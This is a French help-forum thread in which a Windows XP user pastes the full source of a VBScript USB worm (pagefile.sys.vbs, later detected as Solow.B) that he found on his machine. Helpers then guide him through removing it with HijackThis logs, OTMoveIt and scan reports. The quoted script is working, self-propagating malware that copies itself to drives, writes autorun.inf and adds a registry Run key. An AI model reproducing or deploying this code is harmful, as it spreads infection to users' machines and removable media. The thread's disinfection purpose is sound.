Pagefile.sys.vbs ????

Résolu
Bonjour,
Je suis sous Xp
J'ai un fichier nomé "pagefile.sys.vbs" que j'ai repéré parce qu'il se lance au démarage de Windows.
je n'arrive pas à suprimer.
Si quelqu'un pouvait me dire ce que c'est et comment le supprimé.
En voici le contenu.
============================================
nom du fichier "pagefile.sys.vbs"

'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
==========================================================

Merci pour vos informations
Denis
Configuration: Windows XP
Internet Explorer 7.0

27 réponses

Résumé de la discussion

Un fichier nommé pagefile.sys.vbs se lance au démarrage de Windows XP et résiste à la suppression, montrant qu'il modifie le registre et les fichiers autorun sur les lecteurs. Plusieurs réponses recommandent de démarrer en mode sans échec et de supprimer pagefile.sys.vbs et autorun.inf, puis d’effacer la clé Run MSRegInfo dans le registre et les traces sur les lecteurs. Des outils comme OTMoveIt et HijackThis, avec des antivirus, ont été utilisés pour nettoyer fichiers et entrées de registre, mais des retours indiquent une persistance sur le système et sur certains supports. Certaines mentions évoquent aussi la restauration système et la vérification des éléments déplacés ou supprimés lors d’un scan en ligne pour prévenir une réinfection.

Bobot (l’IA à votre service)
  1. le mieux c de passer par le dos, redemarrez la machine, apuyer sur f8 au moment du boot > choisir "invite de commandes en mode sans echec" puis supprimer manuelement avec la commande "DEL/A:R pagefile.sys.vbs" puis pareil avec autorun.inf et ce sur tout les lecteurs amovible et cle usb... eficace
    1. bonjour. sa erres pas êtes plu rapide de formates lordi ? ^^
  2. je vais donc déclaré le problème résolu.
    J'utilise avast depuis long (il était en anglais) ad wares et zonAlarme auusi.
    Une clé USB que windows ouvre tout seul (normalement il doit demandé ce que je souhaites) et le mal étéi fait.
    Je vais êrte inqiet achaque fois que j'utlise un clé USB.
    Pourvu ce tout ce passe bien.
    Encor merci.
    Bon courage.
    1. Contributeur sécurité
      Star Downloader si tu ne l'utilise aps tu peux la desinstaller via ajout/ suppression de prog

      _______________

      mets à jour java : DEMARRER puis PANNEAU DE CONFIGURATION puis JAVA puis mise à jour

      sinon c'est bon!!

      bonne continuation

      pour protéger gratos ton ordi

      securite

      mettre un antivirus

      AVAST en français ou ANTIVIR (en anglais mais très efficace)
      https://www.malekal.com/avira-free-security-antivirus-gratuit/ (merci Malekal)
      -------------
      des anti-espions:

      AD AWARE + SPYBOT + WINDOWS DEFENDER ou SPYWARE TERMINATOR

      +/-
      SPYWAREBLASTER pour immuniser le système contre vundo notamment mais en anglais (mais facile d'utilisation : il suffit de faire "update" pour mettre à jour tous les mois et ensuite" enable all protection" pour immuniser)...

      --------
      un pare feu :
      celui de Windows ou mieux KERIO ou JETICO ou ZONE ALARM (mettre que le parefeu gratuit)

      https://www.clubic.com/telecharger-fiche11071-sunbelt-personal-firewall-ex-kerio.html
      https://manuelsdaide.com/contact/
      http://www.open-files.com/forum/index.php?showtopic=29277
      zonealarm

      -----------

      CCLEANER pour effacer les traces de surf
      1. Bonne nouvelle.
        J'ai désactivé la restauratiion
        j'ai refais un scane
        résultat
        C:\Documents and Settings\Denis\Mes documents\ddd\Flash_Disinfector.exe=>(RAR Sfx o)=>Flash_Disinfector.cmd
        Infecté par: Trojan.Batc.Flashdis.A

        C:\Documents and Settings\Denis\Mes documents\ddd\Flash_Disinfector.exe=>(RAR Sfx o)=>Flash_Disinfector.cmd
        Supprimé (supprimé par mes soins)

        C:\Documents and Settings\Denis\Mes documents\ddd\Flash_Disinfector.exe=>(RAR Sfx o)
        Echec de la mise à jour

        _OTMoveIt\MovedFiles\WINDOWS\pagefile.sys.vbs=>(unicode)
        Infecté par: Win32.Worm.Vbs.Solow.B

        H:\_OTMoveIt\MovedFiles\WINDOWS\pagefile.sys.vbs=>(unicode)
        Supprimé (supprimé par mes soins)

        Rapport hijackthis
        Plus de ligne O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs

        Logfile of Trend Micro HijackThis v2.0.2
        Scan saved at 11:37:20, on 10/10/2007
        Platform: Windows XP SP2 (WinNT 5.01.2600)
        MSIE: Internet Explorer v7.00 (7.00.6000.16544)
        Boot mode: Normal

        Running processes:
        C:\WINDOWS\System32\smss.exe
        C:\WINDOWS\system32\winlogon.exe
        C:\WINDOWS\system32\services.exe
        C:\WINDOWS\system32\lsass.exe
        C:\WINDOWS\system32\svchost.exe
        C:\WINDOWS\System32\svchost.exe
        C:\WINDOWS\system32\ZoneLabs\vsmon.exe
        C:\WINDOWS\Explorer.EXE
        C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
        C:\Program Files\Alwil Software\Avast4\ashServ.exe
        C:\WINDOWS\system32\spoolsv.exe
        C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
        C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
        C:\WINDOWS\system32\ctfmon.exe
        C:\Program Files\RocketDock\RocketDock.exe
        C:\Program Files\RamBoost XP\rambxpfr.exe
        C:\Program Files\Logitech\SetPoint\SetPoint.exe
        C:\Program Files\DateInTray\DateInTray.exe
        C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        C:\Program Files\Fichiers communs\Logitech\KHAL\KHALMNPR.EXE
        C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
        C:\Program Files\DesktopEarth\DesktopEarth.exe
        C:\WINDOWS\system32\ntvdm.exe
        C:\Program Files\FolderSize\FolderSizeSvc.exe
        C:\WINDOWS\system32\nvsvc32.exe
        C:\WINDOWS\system32\svchost.exe
        C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
        C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
        C:\Program Files\NotePad2\Notepad2.exe
        C:\Program Files\Avant Browser\avant.exe
        C:\hijackthis\HijackThis.exe

        R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
        R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.fr/?gws_rd=ssl
        R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
        R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
        R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
        R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
        R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
        R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
        R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
        O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
        O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
        O2 - BHO: (no name) - {FFFFFEF0-5B30-21D4-945D-000000000000} - C:\PROGRA~1\STARDO~1\SDIEInt.dll
        O3 - Toolbar: pdfMachine - {56CF4856-ECB4-4e46-A897-A378821F97B9} - C:\WINDOWS\system32\bgstb.dll
        O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
        O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
        O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
        O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
        O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
        O4 - HKCU\..\Run: [RamBoostXp] C:\Program Files\RamBoost XP\rambxpfr.exe
        O4 - Startup: DateInTray.lnk = C:\Program Files\DateInTray\DateInTray.exe
        O4 - Startup: DesktopEarth AutoStart.lnk = ?
        O4 - Startup: Moniteur Fax-Voix.lnk = C:\OLIFAXVX\MONITEUR.EXE
        O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
        O8 - Extra context menu item: Télécharger avec Star Downloader - C:\Program Files\Star Downloader\sdie.htm
        O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.coupdepoucepc.com/scan8/oscan8.cab
        O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - https://www.trendmicro.com/en_us/forHome/products/housecall.html
        O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game12.zylom.com/activex/zylomgamesplayer.cab
        O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553563000} - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
        O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4896/mcfscan.cab
        O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
        O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
        O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
        O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
        O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
        O23 - Service: Folder Size (FolderSize) - Brio - C:\Program Files\FolderSize\FolderSizeSvc.exe
        O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
        O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
        O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
        O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
        1. Contributeur sécurité
          désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

          puis fais le scan en ligne

          __________
          verifie dans hijackthis que la ligne 4 est virée

          __________

          reactive la restauration systeme
          1. Peut être une bonne nouvelle.
            J'ai regardé le site que tu me conseillais.
            J'ai refais tourner clean.cmd en mode normal et je lui est demander de supprimer les fichiers malvailants.
            Il a supprimeé plusieur fichier autorun.inf , puis bêtement j'ai été sur les fichiers pagefile.sys.vbs jai fais supr et ça à marcher, j'ai été supprimer le clé dans la base de registre et elle a bien voulu partir à la poubelle.
            j'ai redémaré l'ordi, pas de trace des fichier pagefile.sys.vbs au démarage ni sur les DD. Il reste juste le dossier "System Volume Information ".
            Je vais refaire un scan en ligne avec bitdifender et je te tiens informé.
            A+
            Denis
            1. Je veux bien refaire un scan en ligne, mis je vois que les fichiers est toujours lapagefile.sys.vbs , ils demarent avec windows, même en mode sans echec!!!
              Voilà la lite des fichiers ou dossier qui sont apparues à la racine de DD

              RECYCLER dossier avec un fichier "S-1-5-21-1960408961-1425521274-682003330-1004"
              System Volume Information dossier ne pouvant souvrir
              pagefile.sys.vbs qu tu connais

              Je me sent dépassé.
              Merci de me tenir informé.
              Denis
              1. Contributeur sécurité
                désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

                ________________

                refait un scan en ligne pour voir
                ________________

                réactive la restauration systeme.
                ______________
                si ca persiste regarde là
                http://www.malekal.com/FS6519.dll.vbs_VBS_Solow-B.php

                recolle hijackthis et dis tes pbs
                1. Ok
                  j'ai essaué Flash_Disinfector.exe mais très vite un message d'erreur titre "Windows pas de disque" contenu prtiel du message "Eception procesing message"
                  annuler continuer reessayer
                  rien ne marche. obliger de cliquer plein de fois sur annuler pour que la fenetre se ferme.

                  Clean.cmd
                  rapport
                  09/10/2007 a 22:11:40,85

                  *** Recherche des fichiers dans C:
                  C:\autorun.inf FOUND

                  *** Recherche des fichiers dans C:\WINDOWS\

                  *** Recherche des fichiers dans C:\WINDOWS\system32
                  "C:\WINDOWS\Downloaded Program Files\CONFLICT.1" FOUND

                  *** Recherche des fichiers dans C:\Program Files
                  *** Fin du rapport !

                  Je m'arret là pour ce soir

                  je suis sur le pont de puis 3h30 ce matin.
                  dodo.
                  Mais je pense apporter mon ordi à la clinique micro.
                  sauf si pour toi on peut trouver une solution rappide.
                  Un grand merci, tes explication était simple à suivre pour un amateur.
                  Bonne nuit
                  Denis
                  1. Contributeur sécurité
                    pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B

                    c'est un virus donc si j'etais toi je continurai..

                    a plus
                    1. Merci pour ton aide.
                      mais cela commence à devenir trop compliqué pour moi.
                      Surtout que je ne sais pas si c'est un virus ?
                      Mon ordi marche bien.
                      Il y à juste ces fichiers qui sont apparue et le même mais appelé "MSRegInfo" qui ce lance avec Windows sans que je puisse l'en enpécher.
                      Comme personne d'autre ne parle de ce problème sur Google, je croid que je vais en resté là pour le moment.
                      Sauf si tu me dis qu'il faut impérativment poursuivre.
                      A+
                      Denis
                      Encore merci.
                      1. Contributeur sécurité
                        Télécharge ce tool de sUBs:

                        http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe

                        Double-clique dessus et laisse-toi guider.

                        _________________

                        Colle le rapport :
                        Clean permettra de faire du nettoyage et supprimer des fichiers que des anti-virus et anti-spywares n'ont pas pu trouver. Le logiciel est régulièrement mis à jour, vous devrez donc le re-téléchargé pour obtenir une version plus récente.

                        • Téléchargez clean.zip, décompressez-le sur votre bureau (clic droit / extraire tout), vous obtenez alors un dossier clean
                        • Démarrez Windows en mode sans échec : Guide pour redémarrer en mode sans échec
                        • Ouvrez le dossier clean qui se trouve sur ton bureau, et double-cliquez sur clean.cmd, une fenêtre noire va apparaître pendant un instant, laissez la ouverte jusqu'à ce qu'elle se ferme.

                        http://kerio.probb.fr/tuto-Clean-h37.html

                        ________________

                        désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

                        ________________

                        refait un scan en ligne pour voir
                        ________________

                        réactive la restauration systeme.
                        ______________
                        recolle hijackthis et dis tes pbs
                        1. Rappoert AVG
                          ---------------------------------------------------------
                          AVG Anti-Spyware - Rapport d'analyse
                          ---------------------------------------------------------

                          + Créé à: 16:15:26 09/10/2007

                          + Résultat de l'analyse:

                          Rien à signaler.

                          Fin du rapport

                          Mais le les fichiers "pagefile.sys.vbs" son toujours là ?????
                          Denis
                          1. Comme le résultat ne ma semblais pas bon
                            j'ai refait la procédure
                            de fix cheked
                            il ne restait que les lignes
                            O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs j'ai coché que celle ci

                            O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe" cela je sais ce que c'est une barre de menu
                            https://punklabs.com

                            puis j'ai refait MoveIt
                            le rapport copier coller sans redemarage demandé.
                            C:\WINDOWS\pagefile.sys.vbs moved successfully.

                            Created on 10/09/2007 14:56:31
                            1. J'en suis au redemarage après Movelt
                              Mais pas de rapport ou tu dis.
                              J'avais fait un copier coller de la collone de droite :
                              File move failed. C:\WINDOWS\pagefile.sys.vbs scheduled to be moved on reboot.

                              Created on 10/09/2007 14:27:28
                              Je suis en cour de téléchargement de AVG
                              A+
                              1. Contributeur sécurité
                                FIX ces lignes avec hijackthis: ferme toutes les applications , ouvrir hijackthis faire do system scan only puis cocher chaque ligne sur la gauche puis cliquer en bas sur fix cheked:

                                O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
                                O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)

                                O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)

                                O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe

                                O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs

                                O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"

                                O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab

                                ________________

                                télécharge OTMoveIt http://download.bleepingcomputer.com/oldtimer/OTMoveIt.exe (de Old_Timer) sur ton Bureau.
                                double-clique sur OTMoveIt.exe pour le lancer.
                                copie la liste qui se trouve en citation ci-dessous,
                                et colle-la dans le cadre de gauche de OTMoveIt :Paste List of Files/Folders to be moved.

                                Citation :

                                C:\WINDOWS\pagefile.sys.vbs

                                clique sur MoveIt! pour lancer la suppression.
                                le résultat apparaitra dans le cadre "Results".
                                clique sur Exit pour fermer.
                                poste le rapport situé dans C:\_OTMoveIt\MovedFiles.

                                il te sera peut-être demander de redémarrer le pc pour achever la suppression.si c'est le cas accepte par Yes.
                                http://img137.imageshack.us/img137/3558/refaitjk8.th.jpg

                                ________________

                                comme j'ai vu que tu avais netsky scan avec ce logiciel:
                                https://www.broadcom.com/support/security-center

                                et si tu peux vire le fichier incriminé manuellement dans ta sauvegarde foxmail
                                ________________

                                AVG antispyxare

                                https://www.01net.com/telecharger/

                                Tuto :
                                http://www.kachouri.com/tuto/tuto-161-avg-anti-spyware-75-pour-votre-securite.html

                                ->Relance AVG AS -> "Analyse" ->"Paramètres"

                                Sous la question "Comment réagir ?" :

                                -> clique sur "Actions recommandées" et choisis "Quarantaines"
                                -> Re-clique sur l'onglet "Analyse" puis réalise une "Analyse complète du système"

                                Si un fichier est infecté en fin d'analyse

                                ->Clique sur "Appliquer toutes les actions "

                                ->Clique sur "Enregistrer le rapport" puis sur "Enregistrer le rapport sous".

                                ->Enregistre ce fichier texte sur ton bureau ensuite colle le rapport ici

                                ________________

                                désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)

                                ________________

                                refait un scan en ligne pour voir
                                ________________

                                réactive la restauration systeme.
                                ______________
                                recolle hijackthis et dis tes pbs
                                1. Asuivre le rapport
                                  Hijackthis

                                  Logfile of Trend Micro HijackThis v2.0.2
                                  Scan saved at 12:41:40, on 09/10/2007
                                  Platform: Windows XP SP2 (WinNT 5.01.2600)
                                  MSIE: Internet Explorer v7.00 (7.00.6000.16512)
                                  Boot mode: Normal

                                  Running processes:
                                  C:\WINDOWS\System32\smss.exe
                                  C:\WINDOWS\system32\winlogon.exe
                                  C:\WINDOWS\system32\services.exe
                                  C:\WINDOWS\system32\lsass.exe
                                  C:\WINDOWS\system32\svchost.exe
                                  C:\WINDOWS\System32\svchost.exe
                                  C:\WINDOWS\system32\ZoneLabs\vsmon.exe
                                  C:\WINDOWS\Explorer.EXE
                                  C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
                                  C:\Program Files\Alwil Software\Avast4\ashServ.exe
                                  C:\WINDOWS\system32\spoolsv.exe
                                  C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
                                  C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
                                  C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
                                  C:\WINDOWS\System32\WScript.exe
                                  C:\Program Files\RocketDock\RocketDock.exe
                                  C:\WINDOWS\system32\ctfmon.exe
                                  C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
                                  C:\Program Files\FolderSize\FolderSizeSvc.exe
                                  C:\WINDOWS\system32\ntvdm.exe
                                  C:\WINDOWS\system32\nvsvc32.exe
                                  C:\WINDOWS\system32\svchost.exe
                                  C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
                                  C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
                                  C:\hijackthis\HijackThis.exe

                                  R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
                                  R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.fr/?gws_rd=ssl
                                  R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
                                  R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
                                  R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
                                  R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
                                  R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
                                  R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
                                  R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
                                  O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
                                  O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
                                  O2 - BHO: IEHlprObj Class - {CE7C3CF0-4B15-11D1-ABED-709549C10111} - C:\Program Files\TrueDownloader\truedownloaderie.dll
                                  O2 - BHO: (no name) - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - (no file)
                                  O2 - BHO: (no name) - {FFFFFEF0-5B30-21D4-945D-000000000000} - C:\PROGRA~1\STARDO~1\SDIEInt.dll
                                  O3 - Toolbar: pdfMachine - {56CF4856-ECB4-4e46-A897-A378821F97B9} - C:\WINDOWS\system32\bgstb.dll
                                  O3 - Toolbar: (no name) - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - (no file)
                                  O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
                                  O4 - HKLM\..\Run: [bgsmsnd.exe] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\bgsmsnd.exe
                                  O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
                                  O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
                                  O4 - HKLM\..\Run: [MSRegInfo] C:\WINDOWS\pagefile.sys.vbs
                                  O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
                                  O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
                                  O4 - HKCU\..\Run: [RamBoostXp] C:\Program Files\RamBoost XP\rambxpfr.exe
                                  O4 - Startup: DateInTray.lnk = C:\Program Files\DateInTray\DateInTray.exe
                                  O4 - Startup: DesktopEarth AutoStart.lnk = ?
                                  O4 - Startup: Moniteur Fax-Voix.lnk = C:\OLIFAXVX\MONITEUR.EXE
                                  O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
                                  O8 - Extra context menu item: Télécharger avec Star Downloader - C:\Program Files\Star Downloader\sdie.htm
                                  O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://software-dl.real.com/13f0b4f24030b75c4e06/netzip/RdxIE601_fr.cab
                                  O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.coupdepoucepc.com/scan8/oscan8.cab
                                  O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - https://www.trendmicro.com/en_us/forHome/products/housecall.html
                                  O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game12.zylom.com/activex/zylomgamesplayer.cab
                                  O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553563000} - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
                                  O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4896/mcfscan.cab
                                  O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
                                  O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
                                  O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
                                  O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
                                  O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Logiciel Bluetooth\bin\btwdins.exe
                                  O23 - Service: Folder Size (FolderSize) - Brio - C:\Program Files\FolderSize\FolderSizeSvc.exe
                                  O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
                                  O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
                                  O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
                                  O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
                                  1. Bonjour
                                    et encore merci pour ton aide.
                                    Voici le rapport bitdifender

                                    C:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                                    C:\pagefile.sys.vbs=>(unicode) Supprimé
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Echec de la désinfection
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146039.vbs=>(unicode) Supprimé
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Echec de la désinfection
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146040.vbs=>(unicode) Supprimé
